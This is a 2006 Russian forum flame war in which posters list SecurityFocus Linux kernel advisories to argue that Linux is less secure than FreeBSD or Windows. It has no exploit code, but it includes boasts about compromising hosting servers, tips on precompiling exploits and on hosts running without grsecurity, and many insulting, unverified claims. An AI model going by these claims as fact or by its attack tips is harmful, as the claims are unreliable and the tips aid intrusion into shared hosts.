2 Linux Kernel NFS Client Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-23 00:00:00 PST
URL: http://www.securityfocus.com/bid/16922
Как ты там сказал - NFS очень редко используется? Тем более локальная..
Но ты же её причислил к уязвимостям, значит, тогда ты признаешь, что он бесполезна и под FreeBSD и под линуксятиной.
Цитата

Гость писал:

Для тех, кто пользуется XFS, у тех у кого нет XFS на диске, нет и DoS. Естественно в отличие от убогой и винды и фри у фри больше функционала, больше разных I/O шедуллеров, больше файловых систем, поэтому и дыр должно быть больше.
А кто пользуется - у того есть, и это уже не сверх редкая сетевая файловая система.
Да, в отличие от убогого линуксятника у FreeBSD больше функционала, а из-за того, что её писали грамотные люди в ней несравнимо меньше багов, чем в туксятнике.
Цитата

Гость писал:

Цитата

Хренсмаслом пишет:
11 Linux Kernel 64-Bit SMP Routing_ioctl() Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-23 00:00:00 PST
URL: http://www.securityfocus.com/bid/14902
Только для 64-разрядных систем
Дык 64 битные системы – сейчас их предостаточно, и это очень серьёзный DoS
Цитата

Гость писал:

Цитата

Хренсмаслом пишет:
29 Linux Kernel ICMP_Push_Reply Remote Denial Of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-02 00:00:00 PST
URL: http://www.securityfocus.com/bid/16044
Что ты там про ICF говорил? Если высказать аналогичную отмазку, что у нормальных админов все кроме ICMP unreachable, ICMP reply и DefrgNeeded выключено, то проблемы нет.
Если касательно nfs ты признал поражение.
То вот про баг IGMP ты сопротивлялся, а это тебе не IGMPv3, это ICMP, который используется намного чаще, и которые не следует просто так отключать, так что это серьёзнейший удаленный DoS который кладёт туксятник по полной программе.
Цитата

Гость писал:

Цитата

Хренсмаслом пишет:
13 Linux Kernel Netfilter Do_Replace Local Buffer Overflow Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-22 00:00:00 PST
URL: http://www.securityfocus.com/bid/17178
С правами рута эксплуатриутся гг?
ВДСки можно иметь. -)

Цитата

Гость писал:

Цитата

Хренсмаслом пишет:
14 Linux Kernel Raw_sendmsg() Kernel Memory Access Vulnerability (Vulnerabilities) Rank: 485
Last modified on: 2006-03-21 00:00:00 PST
URL: http://www.securityfocus.com/bid/14787
Аналог фревого kmem.  
Т.е. получается что мы уже и nfs перекрыли и kmem перекрыли, а рассмотрели только 5 уязвимостей из 100? Хех, что же будет дальше?
Цитата

Гость писал:

Цитата

Хренсмаслом пишет:
24 Linux Kernel ProcFS Kernel Memory Disclosure Vulnerability (Vulnerabilities) Rank: 485
Last modified on: 2006-03-02 00:00:00 PST
URL: http://www.securityfocus.com/bid/16284
Тоже что и kmem.
Уже второй kmem? -))))
Цитата

Гость писал:

Цитата

Хренсмаслом пишет:
49 Linux Kernel Device Driver Virtual Memory Flags Unspecified Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-07 00:00:00 PST
URL: http://www.securityfocus.com/bid/12338
*  2.5 летне давности(jan 2004)
Ты бы хоть читал внимательно, не jan 2004, а jan 2005, так что намного свежее.
Цитата

Гость писал:

Цитата

Хренсмаслом пишет:
80 Linux Kernel SYSFS_Write_File Local Integer Overflow Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-01-11 00:00:00 PST
URL: http://www.securityfocus.com/bid/13091
Не вижу чтобы куда-то в sysfs мог писать кто-то кроме рута.
Да нет, как раз таки позволяет выполнять код с правами суперюзера.
Цитата

Гость писал:

Цитата

Хренсмаслом пишет:
78 Linux Kernel Netfilter Memory Leak Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-01-11 00:00:00 PST
URL: http://www.securityfocus.com/bid/12816
Баге больше года.
Ровно год и это отличный DoS.
Ты приводил бесполезные дырки FreeBSD и более раннего периода.

Итого, ты описал только 20 уязвимостей (я перекомментировал 10 из твоих)
Что мы получаем? Мы получаем что уже из этих 20 уязвимостей дырявое ядро линукса имеет в 3 раза больше local уязвимостей уязвимостей, чем FreeBSD, мало того, в ядре FreeBSD нет ни одной рабочей local DoS и уж тем более позорных Remote DoS, которыми изобилует решето линукса аж в кол-ве 4ёх штук (ты здесь успел рассмотреть только одну), а их ещё 3
Linux Kernel ICMP_Push_Reply RemoteDenial Of Service
Linux Kernel IP6_Input_Finish Remote Denial Of Service
Linux Kernel ICMP_Send Remote Denial Of Service
Linux Kernel Netfilter Ipt_recent Remote Denial of Service
Т.е. даже по этим 20 из 100 уязвимостям , преимущественно за 2006 год, linux намного дырявее FreeBSD, хотя у FreeBSD мы брали уязвимости аж за 2 года.
По показателю Remote DoS линукс - это дырявое ведро, по сравнению с Windows.

А рассмотрел ты всего лишь номера 2, 3, 6, 11, 13, 14, 17, 19, 24, 26, 29, 37, 40, 59, 61, 64, 78, 80, 81
А это всего 20 из 81 уязвимости, т.е. ты пропустил мимо ушей 61 уязвимость.

И так, на десерт перечисляю все уязвимости, которые ты поленился рассмотреть -

1 Linux Kernel SYSFS PAGE_SIZE Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-04-07 00:00:00 PDT
URL: http://www.securityfocus.com/bid/17402

4 Linux Kernel ELF File Entry Point Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-23 00:00:00 PST
URL: http://www.securityfocus.com/bid/16925

5 Linux Kernel Sysctl Unregistration Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-23 00:00:00 PST
URL: http://www.securityfocus.com/bid/15365

7 Linux Kernel Get_Compat_Timespec and PTrace Local Denial Of Service Vulnerabilities (Vulnerabilities) Rank: 418
Last modified on: 2006-03-23 00:00:00 PST
URL: http://www.securityfocus.com/bid/17216

8 Linux Kernel die_if_kernel Local Denial of Service Vulnerability (Vulnerabilities) Rank: 485
Last modified on: 2006-03-23 00:00:00 PST
URL: http://www.securityfocus.com/bid/16993

9 Linux Kernel sys_mbind System Call Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-23 00:00:00 PST
URL: http://www.securityfocus.com/bid/16924

10 Linux Kernel Ssockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities (Vulnerabilities) Rank: 485
Last modified on: 2006-03-23 00:00:00 PST
URL: http://www.securityfocus.com/bid/17203

12 Linux Kernel Security Key Functions Local Copy_To_User Race Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-23 00:00:00 PST
URL: http://www.securityfocus.com/bid/17084

15 Linux Kernel ZLib Invalid Memory Access Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-17 00:00:00 PST
URL: http://www.securityfocus.com/bid/14719


16 Linux Kernel EXT2/EXT3 File System Access Control Bypass Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-17 00:00:00 PST
URL: http://www.securityfocus.com/bid/14793

18 Linux Kernel IA32 ExecVE Local Buffer Overflow Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-16 00:00:00 PST
URL: http://www.securityfocus.com/bid/14205

20 Linux Kernel NAT Handling Memory Corruption Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-16 00:00:00 PST
URL: http://www.securityfocus.com/bid/15531

21 Linux Kernel IP ID Information Disclosure Weakness (Vulnerabilities) Rank: 418
Last modified on: 2006-03-16 00:00:00 PST
URL: http://www.securityfocus.com/bid/17109

22 Linux Kernel ELF Core Dump Local Buffer Overflow Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-16 00:00:00 PST
URL: http://www.securityfocus.com/bid/13589

23 Linux Kernel DM-Crypt Local Information Disclosure Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-10 00:00:00 PST
URL: http://www.securityfocus.com/bid/16301

25 Linux Kernel PROC Filesystem Local Information Disclosure Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-02 00:00:00 PST
URL: http://www.securityfocus.com/bid/11937

27 Linux Kernel handle_stop_signal Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-02 00:00:00 PST
URL: http://www.securityfocus.com/bid/16856

28 Linux Kernel SET_MEMPOLICY Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-02 00:00:00 PST
URL: http://www.securityfocus.com/bid/16135


30 Linux Kernel IP6_Input_Finish Remote Denial Of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-02 00:00:00 PST
URL: http://www.securityfocus.com/bid/16043


31 Linux Kernel INVALIDATE_INODE_PAGES2 Local Integer Overflow Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-02 00:00:00 PST
URL: http://www.securityfocus.com/bid/15846

32 Linux Kernel Find_Target Local Denial Of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-02 00:00:00 PST
URL: http://www.securityfocus.com/bid/14965

33 Linux Kernel mq_open System Call Unspecified Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-02 00:00:00 PST
URL: http://www.securityfocus.com/bid/16283

34 Linux Kernel SDLA_XFER Kernel Memory Disclosure Vulnerability (Vulnerabilities) Rank: 485
Last modified on: 2006-02-23 00:00:00 PST
URL: http://www.securityfocus.com/bid/16759

35 Linux Kernel IPv6 FlowLable Denial Of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-22 00:00:00 PST
URL: http://www.securityfocus.com/bid/15729

36 Linux Kernel IP_VS_CONN_FLUSH Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-22 00:00:00 PST
URL: http://www.securityfocus.com/bid/15528

38 Linux Kernel Stack Fault Exceptions Unspecified Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-22 00:00:00 PST
URL: http://www.securityfocus.com/bid/14467

39 Linux Kernel Sendmsg() Local Buffer Overflow Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-17 00:00:00 PST
URL: http://www.securityfocus.com/bid/14785

41 Linux Kernel ICMP_Send Remote Denial Of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-17 00:00:00 PST
URL: http://www.securityfocus.com/bid/16532

42 Linux Kernel IPV6 Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-17 00:00:00 PST
URL: http://www.securityfocus.com/bid/15156

43 Linux Kernel Sysctl_String Local Buffer Overflow Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-17 00:00:00 PST
URL: http://www.securityfocus.com/bid/16141

44 Linux Kernel Multiple Vulnerabilities (Vulnerabilities) Rank: 418
Last modified on: 2006-02-10 00:00:00 PST
URL: http://www.securityfocus.com/bid/12598

45 Linux Kernel SNMP Handler Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-09 00:00:00 PST
URL: http://www.securityfocus.com/bid/14611


46 Linux Kernel IPSec Policies Authorization Bypass Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-09 00:00:00 PST
URL: http://www.securityfocus.com/bid/14609

47 Linux Kernel ISO File System Denial Of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-09 00:00:00 PST
URL: http://www.securityfocus.com/bid/14614

48 Linux Kernel FIB_LOOKUP Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-09 00:00:00 PST
URL: http://www.securityfocus.com/bid/16139

49 Linux Kernel Device Driver Virtual Memory Flags Unspecified Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-07 00:00:00 PST
URL: http://www.securityfocus.com/bid/12338

50 Linux Kernel EXT2 File System Information Leak Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-07 00:00:00 PST
URL: http://www.securityfocus.com/bid/12932

51 Linux Kernel Coda_Pioctl Local Buffer Overflow Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-07 00:00:00 PST
URL: http://www.securityfocus.com/bid/14967

52 Linux Kernel PTrace CLONE_THREAD Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-07 00:00:00 PST
URL: http://www.securityfocus.com/bid/15642

53 Linux Kernel POSIX Timer Cleanup Handling Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-07 00:00:00 PST
URL: http://www.securityfocus.com/bid/15722

54 Linux Kernel Multiple Security Vulnerabilities (Vulnerabilities) Rank: 418
Last modified on: 2006-02-07 00:00:00 PST
URL: http://www.securityfocus.com/bid/16414

55 Linux Kernel SEARCH_BINARY_HANDLER Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-07 00:00:00 PST
URL: http://www.securityfocus.com/bid/16320

56 Linux Kernel do_coredump Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-07 00:00:00 PST
URL: http://www.securityfocus.com/bid/15723

57 Linux Kernel File Lock Lease Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-07 00:00:00 PST
URL: http://www.securityfocus.com/bid/15745

58 Linux Kernel Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities (Vulnerabilities) Rank: 418
Last modified on: 2006-02-07 00:00:00 PST
URL: http://www.securityfocus.com/bid/12837


60 Linux Kernel PTraced Child Auto-Reap Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-07 00:00:00 PST
URL: http://www.securityfocus.com/bid/15625

62 Linux Kernel Multiple Security Vulnerabilities (Vulnerabilities) Rank: 418
Last modified on: 2006-01-17 00:00:00 PST
URL: http://www.securityfocus.com/bid/15049

63 Linux Kernel SCSI ProcFS Denial Of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-01-17 00:00:00 PST
URL: http://www.securityfocus.com/bid/14790

65 Linux Kernel Multithreaded ITimer Leak Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-01-16 00:00:00 PST
URL: http://www.securityfocus.com/bid/15533

66 Linux Kernel Multiple Memory Leak Local Denial Of Service Vulnerabilities (Vulnerabilities) Rank: 418
Last modified on: 2006-01-16 00:00:00 PST
URL: http://www.securityfocus.com/bid/15076

67 GRSecurity Elevated Service Privileges Weakness (Vulnerabilities) Rank: 118
Last modified on: 2006-01-16 00:00:00 PST
URL: http://www.securityfocus.com/bid/16261

68 Linux Kernel USB Subsystem Local Denial Of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-01-13 00:00:00 PST
URL: http://www.securityfocus.com/bid/14955

69 Linux Kernel Radionet Open Source Environment Unspecified Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-01-12 00:00:00 PST
URL: http://www.securityfocus.com/bid/13886

70 Linux Kernel 64 Bit Multiple Unspecified Local Denial of Service Vulnerabilities (Vulnerabilities) Rank: 418
Last modified on: 2006-01-12 00:00:00 PST
URL: http://www.securityfocus.com/bid/13904

71 Linux Kernel XFRM Array Index Buffer Overflow Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-01-12 00:00:00 PST
URL: http://www.securityfocus.com/bid/14477

72 Linux Kernel Non-Zero Keyring Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-01-12 00:00:00 PST
URL: http://www.securityfocus.com/bid/14517

73 Linux Kernel Session Keyring Allocation Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-01-12 00:00:00 PST
URL: http://www.securityfocus.com/bid/14521

74 Linux Kernel World Writable SYSFS DRM Debug File Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-01-12 00:00:00 PST
URL: http://www.securityfocus.com/bid/15154

75 Linux Kernel ZLib Local Null Pointer Dereference Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-01-12 00:00:00 PST
URL: http://www.securityfocus.com/bid/14720

76 Linux Kernel Netfilter Ipt_recent Remote Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-01-12 00:00:00 PST
URL: http://www.securityfocus.com/bid/14791

77 Linux Kernel SCSI IOCTL Integer Overflow Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-01-11 00:00:00 PST
URL: http://www.securityfocus.com/bid/12198

79 Multiple Linux Kernel IOCTL Handlers Local Memory Corruption Vulnerabilities (Vulnerabilities) Rank: 418
Last modified on: 2006-01-11 00:00:00 PST
URL: http://www.securityfocus.com/bid/13651

И так если рассмотреть оставшиеся 61 уязвимость, то окажется, что там указано ещё такое количество дырок решета туксятника, что даже страшно подумать, насколько линукс дырявый.
И насколько крепка каменная крепость FreeBSD с одной своей уязвимостью в kmem().
Да и NT не имеет такого кол-ва багов, как решето линуксятины.
 
Цитата
Хренсмаслом пишет:
Гость писал:

Нет - это локальный рут в дырявой FreeBSD, которая имеет сендмыло в базовой системе по умолчанию, как и локаьный рут для некоторых Linux-ов, в которых sendmail - умолчальный MTA.


Ни в некоторых, а в большинстве линускятников по умолчанию.
Нет, я все-таки прав. Хренсмаслом в глаза не видел ни одного дистриба линуха. Иначе бы не нес этот бред.
Есть дистрибы, которые бегают с сендмылом, но отнюдь не большинство.

Цитата
Хренсмаслом пишет:
А вот во FreeBSD нет ни одной remote дыры -)
Тебя же только что ткнули в  баги в wifi-шных драйверах. Если ты считаешь, что wifi сети редкость, то вылези из своего танка, стоящего на северном полюсе.

Цитата
Хренсмаслом пишет:
remote attacker may be able to execute arbitrary code with the
privileges of the user running sendmail, typically root.


Typically – "типично, в том числе" для рута.

Насмешил :))))))))

-How do you do?   -
-All right.
-Как ты это делаешь ?
-Все правой.
Похоже ?
Вот тут-то ты и продемонстрировал, что английский не знаешь. Перевожу для двоечников:
"удаленный атакующий может запустить произвольный код с привилегиями пользователя, под которым крутится sendmail, обычно под root'ом"

Цирк.
Был воинствующий виндузятник, стал воинствующий виндоБЗДун, не владеющий сутью вопроса и не знающий английского языка.
Да как у тебя язык поворачивается судить о системе, которую ты в глаза не видел ? А ?

Вобщем как обычно в холиворах: опонент с предметом спора знаком шапочно, очень многие вопросы игнорирует, внаглую искажает факты.
"В сад, учить матчасть, читать man'ы и man совесть".
 
Цитата
Хренсмаслом пишет:
Что касается gcc - эксплоит можно скомпилировать заранее, многие чаще всего так и делают, потому что на шеллах очень часто проблемы с gcc.
со включенным TPE если владалец файла не root, вам это ничего не даст. Плюс mod_rewrite.
Цитата
Хренсмаслом пишет:
К счастью на многих крупных серверах с десятками тысяч клиентов grsec отключен. Говорят из-за нагрузки.
Это как DEP в NT :) С ним тоже трудно что-либо сделать, но на 2k3 Sp1 он иногда не включен.
если камни не умеют nx, то понятно почему.
Цитата
Хренсмаслом пишет:
sa-exim Unauthorized File Access Vulnerability - дырка в спамфильтре под exim.
ага-ага. Эту хрень надо собирать отдельно, она не идёт штатно с exim, и фильтруется всё без sa-exim.
Цитата
An attacker can exploit this issue to delete arbitrary files in the context of the user running the affected application.
И где тут "Популярные стандартные демоны, которые запускаются с привилегированными правами на большинстве хостинговых серверов." ?
Цитата
Хренсмаслом пишет:
Да если бы начали заменять, сразу бы багов на альтернативные мэйлеры нашлось.
да-да... postfix 2.x ... он конечно же не популярен и его не использует.
Цитата
Хренсмаслом пишет:
различные телнет
wtf? его штатно нигде нет.
Цитата
Хренсмаслом пишет:
ssh даемоны, ftpd, httpd, cron (local), всякие cpanel (local/remote) да и вообще проще взять листинг запущенных сервисов и оттуда их назвать.
ssh? почему во множественном? как правило это openssh. И давно вы последнюю дырку с исполнением кода видели? фтп? слишком обще.  интересно посмотреть на страшную дыру в vsftpd, http? вы думаете что обязательно апач?
Цитата
Хренсмаслом пишет:
Да вот не всегда в дистрибутивах linux стоят в точности одни и те же службы, что и во freebsd.
если примерно одного времени розлива - то одни и те же.
Цитата
Хренсмаслом пишет:
Я уже писал об этом выше (искать по строчке ICS).
ок. ещё раз повторю: ics автоматом ставит на внутреннем интерфейсе адрес 192.168.0.1 В случае двух локальных сетей у нас будет два интерфейса с адресами 192.168.0.1 и 2 подсети с адресами 192.168/24. И неплохо бы произвольный хост из любой локальной сети по любому из каналов.

Цитата
Хренсмаслом пишет:
Разумеется, вы включите grsec, а ядро будет такое, что эксплоиты под него окажутся не особо полезны. А может ещё и закроете wget, perl, python, да и вообще всё что можно.
можно и без grsec. Просто это будет amd64, либо ppc.
Цитата
Хренсмаслом пишет:
Давайте лучше вы поломаете 2k3 sp1, через доступ к серверу IIS с secureiis, на котором будет простой скриптик `$cmd`, через который вы сможете выполнить любую допущенную команду, в общем что-то вроде browser-shell :)
Что будет вам мешать - на сервере будет включен DEP, будет стоять VR, а в качестве SO будет использована политика hisecws. Ах да, баги в DEP-е типа lookaside пофиксены. Ну и, разумеется, порты нетбиоса не будут доступны даже с лупбэка, а к RPC доступ будет ограничивать как раз VR.
Я уверен, что вы не сможете что-либо сделать, даже DoS.
вы ставите самое свежее, а я предлагаю заведомо дырявые версии.
 
Цитата
Хренсмаслом пишет:
Да одна дыра в ядре линукса эксплуатируемая через linuxmsyncex.c стоит всех перечисленных тобою псевдо-уязвимостей FreeBSD
не работает ваша linuxmsyncex.c
Цитата
Хренсмаслом пишет:
На нормальных, но раза в 3 ниже, чем под Windows.
А DirectX игры - там потеря, наверное раз в 10
вы меряли? числа где?
Цитата
Хренсмаслом пишет:
Ни в некоторых, а в большинстве линускятников по умолчанию.
фи. в дебиан - exim, в mandriva - postfix.
Насчёт "по умолчанию" - бред. не стоит выдавать желаемое за действительное.  При установке можно выбрать.
Цитата
Хренсмаслом пишет:
ULOG через сокеты netlink передаёт пакеты специальному даемону, который может выполнять журналирование в различных форматах, короче говоря ULOG - это лишняя нагрузка на ЦП.
плохо разбираетесь в вопросе. ULOG был создан как раз потому что LOG сильнее нагружает процессор. ULOG поддерживает буфер, в который накапливаются пакеты, а после превышения некоторого порога содержимое буфера скидывается в юзерспейс. Т.о. вместо многократного копирования мелких блоков мы копируем один большой блок. Кроме того ULOG может скидывать опр. число байт из пакета, а не пакет целиком.
Цитата
Хренсмаслом пишет:
Если эту "дыру" легко закрыть, о чём я тебе уже несколько раз писал, то вот сотню дыр в решете, т.е. в функциях ядра линукса ты никак не закроешь.
ну если линукс такой дырявый, что ж вы:
Цитата
Хренсмаслом пишет:
Разумеется, вы включите grsec, а ядро будет такое, что эксплоиты под него окажутся не особо полезны.

Цитата
Хренсмаслом пишет:
А линукс - старайся не старайся, ни фотоаппараты ни мобильники полнофункционально работать не будут, да какие там полнофункционально, большинство мобильников вообще нормально не работает под кривым ПО линуксятника.
а в freebsd фотоаппараты и мобильники работают?

Цитата
Хренсмаслом пишет:
В Windows в св-вах соединения канала (ICS), выбираешь любое подключение по локальной сети, для которого будет расшарен данный интернет канал. И делаешь так с обоими соединениями.
не получится. у вас будут две сети с одинаковыми адресами.
Цитата
Хренсмаслом пишет:
Если у тебя сеть мелких или средних размеров, то ISA будет там хорошо работать, и iptables тоже. Только вот в крупных сетях с реально большой нагрузкой программные брандмауэры будут неимоверно нагружать ЦП, и iptables относится к таким брандмауэрам. В таких сетях по любому ставятся аппаратные средства, вроде роутеров.
аппаратных роутеров не существует. маршрутизация осуществляется только программно и силами cpu.
насчёт "неимоверно загружать цп". Откройте для себя nf-hipac:
клик1
клик2
клик3
у людей даже на гигабите скорость не падает.
интересно будет посмотреть что станет с ISA на гигабите.
Цитата
Хренсмаслом пишет:
То вот про баг IGMP ты сопротивлялся, а это тебе не IGMPv3, это ICMP, который используется намного чаще, и которые не следует просто так отключать, так что это серьёзнейший удаленный DoS который кладёт туксятник по полной программе.
проверял. не работает.
 
Цитата

SpherIX писал:

Нет, я все-таки прав. Хренсмаслом в глаза не видел ни одного дистриба линуха. Иначе бы не нес этот бред.
Есть дистрибы, которые бегают с сендмылом, но отнюдь не большинство.
Да нет, прав я. А вы несёте какой-то маразм.
Практически все мелкие и крупные, российские и зарубежные isp, которые предлагают услуги хостинга/шеллов, а также, самое главное - VDS выбирают sendmail при установке в качестве MTA (у меня было 3 линукс VDS-ки от различных провайдеров и везде в качестве mta использовался sendmail)
А вы просто кроме своего домашнего компьютера больше линукс нигде и не видели :) Ну я очень рад, что вы выбрали там postfix или что-нибудь ещё, только на мнение остальных вы не повлияете.

Что касается меня - то вы нагло врёте, потому что не знаете, что я видел и чем пользовался. Я видел и пользовался sendmail в качестве MTA как и на домашних компьютерах, так и огромным кол-ве дистрибутивов на различных хостингах.  
Цитата

SpherIX писал:

Тебя же только что ткнули в баги в wifi-шных драйверах. Если ты считаешь, что wifi сети редкость, то вылези из своего танка, стоящего на северном полюсе.
Милый мой друг, для того чтобы эскплуатировать WIFI уязвимость, нужно чтобы у тебя стоял WIFI девайс и чтобы кто-то там находился рядом и сканировал броадкастом на наличие WIFI сетей. Мало того, что ни на домашних ПК, ни уж тем более на хостингах такие девайсы не стоят, но помимо этого для того чтобы отиметь машину тебе придётся !ехать туда, где развёрнута эта беспроводная сеть и только оттуда её можно эксплуатировать.
"An integer overflow in the handling of corrupt IEEE 802.11 beacon or
probe response frames when scanning for existing wireless networks can
result in the frame overflowing a buffer."
Т.е. даже если ты найдёшь офис, где пользуются WIFI тебе придётся туда !ехать, а потом ещё искать в каком месте доступна эта сеть :)

Короче, я на 100% знаю, что ни одной машины в интернете ты ещё через эту дырку не поимел и не поимеешь никогда, так что это бесполезная уязвимость, в отличии от сотни дыр в ядре линукса, которые эксплуатируются через интернет и без всяких там WIFI девайсов :)
А все твои слова высосаны из пустого места.
Цитата

SpherIX писал:

Вот тут-то ты и продемонстрировал, что английский не знаешь. Перевожу для двоечников:
"удаленный атакующий может запустить произвольный код с привилегиями пользователя, под которым крутится sendmail, обычно под root'ом"
Ты ни только не знаешь английский, но ещё и активно фантазируешь.
Если бы они хотели сказать "обычно под рутом" (разумеется в значении, как ты мечтал чтобы это было переведено - обычно (чаще всего)), они бы написали "usually root", либо "commonly root"
А теперь перевожу для супер "знатоков".

remote attacker may be able to execute arbitrary code with the
privileges of the user running sendmail, typically root.
Удаленный атакующий имеет возможность запустить произвольный код с привилегиями пользователя, под которым запущен sendmail, что типично для рута. (Т.е. если sendmail запущен под рутом, то этого рута поимеют, а "обычно" - это значит в большинстве случаев, а это не верно, так как sendmail под рутом могут вообще ни разу не запустить)
А вообще правильно переводить typically по принципу "in a typically manner" http://www.m-w.com/cgi-bin/dictionary?va=typically , а "что типично" это как раз и есть это самое на русском языке, только в читаемом виде, без искажения значения typically, которое ты как раз исказил.

"знаток" если не веришь мне воспользуйся lingvo
typically - http://www.lingvo.ru/lingvo/Translate.asp?LingvoAction=translate&Ln=1&words=typically&DoNotSave=0&text=typically&LangPara=1
А вот если бы они имели ввиду "обычно", (разумеется в значении, как ты мечтал чтобы это было переведено - обычно (чаще всего)), то -
http://www.lingvo.ru/lingvo/Translate.asp?LingvoAction=translate&Ln=1&words=usually&DoNotSave=0&text=usually&LangPara=1
и
http://www.lingvo.ru/lingvo/Translate.asp?LingvoAction=translate&Ln=1&words=commonly&DoNotSave=0&text=commonly&LangPara=1
Когда ты так "мастерски" заменил "типично", на "обычно", ты серьёзно изменил перевод, оправдав это якобы "красивым" звучанием.


Так что цирк устраиваешь ты.
А все твои слова - беспочвенные фантазии, придуманные тобою же.
Также ты не знаешь английского, но являешься настолько самоуверенным подростоком, что даже пытаешься изобразить, будто ты его знаешь.
Все твои слова - это лишь подростковые фантазии и мнимая самоуверенность, линуксятник ты только потому, что это модно у "техно" молодежи, которая на самом деле ничего толком не знает, только язычком работает как ты.
Так что тебе, с твоим "садом и матчастью" следует повзрослеть, а пока единственное кем ты можешь быть, это клоуном.
helpctr клоун ;)
 
Цитата

^rage^ писал:

со включенным TPE если владалец файла не root, вам это ничего не даст.
Запрет запуска файлов под нерутовским аккаунтом - это сильная урезка функциональности сервера. А на серверах всегда обычно по несколько человек, многие из которых не руты. Да и большинство хостинговых серверов предоставляют услугу "доступ через ssh", а со включенной опцией CONFIG_GRKERNSEC_TPE легальные пользователи просто не смогут ничего запустить, а тогда какой же это доступ... такой, который никому не нужен и никто просто не будет пользоваться услугами данного хостинг провайдера.
Цитата

^rage^ писал:

если камни не умеют nx, то понятно почему.
На большинстве домашних ПК по всему миру сейчас стоят достаточно современные процессоры AMD Atlon-64, AMD Sempron, либо Pentium4 и Pentium D.
Все они поддерживают EVP (NX/XD биты).
Даже в России большинство пользователей имеет пусть слабые, но всё же уже поддерживающие EVP процессоры. Ну а про США, где 75% населения имеют доступ к интернету и более 90% имеют ПК (а именно в США больше всего ПК) я вообще молчу.

Цитата

^rage^ писал:

ага-ага. Эту хрень надо собирать отдельно, она не идёт штатно с exim, и фильтруется всё без sa-exim.
Я лишь указал, что дырки в никс-приложениях везде, даже в редком спам фильтре непопулярного exim :)
Цитата

^rage^ писал:

И где тут "Популярные стандартные демоны, которые запускаются с привилегированными правами на большинстве хостинговых серверов." ?
Возьми хотя бы ssh или cpanel:)
Цитата

^rage^ писал:

да-да... postfix 2.x ... он конечно же не популярен и его не использует.
По сравнению с sendmail - конечно.
Цитата

^rage^ писал:

wtf? его штатно нигде нет.
Множество isp предлагает своим пользователям такую услугу и берёт за неё меньше, чем за ssh. А значит telnetd включен и потенциально уязвим.
Цитата

^rage^ писал:

интересно посмотреть на страшную дыру в vsftpd, http? вы думаете что обязательно апач?
Большинство *nix серверов в интернете (более 95%) используют именно дырявые апач. Почему дырявый? - http://search.securityfocus.com/swsearch?query=apache&sbm=bid&submit=Search%21&metaname=alldoc&sort=swishlastmodified
Если бы всякие nginx или thttpd использовали чаще, то и дырки бы в них начали искать, помните про тот же фаерфокс ;), а пока ими мало кто пользуется, никто не будет в них ничего искать.
Цитата

^rage^ писал:
